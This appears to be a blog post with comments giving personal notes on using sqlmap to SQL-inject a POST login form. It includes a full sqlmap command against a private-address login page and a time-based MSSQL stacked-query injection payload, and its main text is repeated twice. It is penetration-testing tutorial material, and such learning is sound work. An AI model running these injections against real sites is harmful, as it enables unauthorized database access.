Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <--Force back-end DBMS to this value
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
Some of these, such as "--method" are deprecated in the new version of sqlmap (out last week). See the new version 0.9 for details. You may want to check out the "--forms" flag as well as tons of other new ones.
ReplyDeleteI suggest starting with the ChangeLog and the new documentation
well aint that a bitch...damn you active development process mucking with my shitty personal documentation!
ReplyDeletethanks for the heads up on that dre
everybody should checkout the latest revision from sqlmap's repository (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev) because the project has evolved a lot in the past year
ReplyDeleteI have yet to have Post functionality work correctly with SQLMap. Generally when I find a POST Request and verify it manually I hunt around for a get request sqli if I am using sqlmap just because it usually fails horribly with POSTS..
ReplyDeleteI will have to check out the svn repository and maybe they have fixed this issue as well.
UPDATES: http://hackertarget.com/sqlmap-post-request-injection/
ReplyDeleteNice but not the perfect way. What if headers contain POST data in JSON format and the website is using AJAX for making communications with the server. Obviously, server respond with 403 Error as response.
ReplyDelete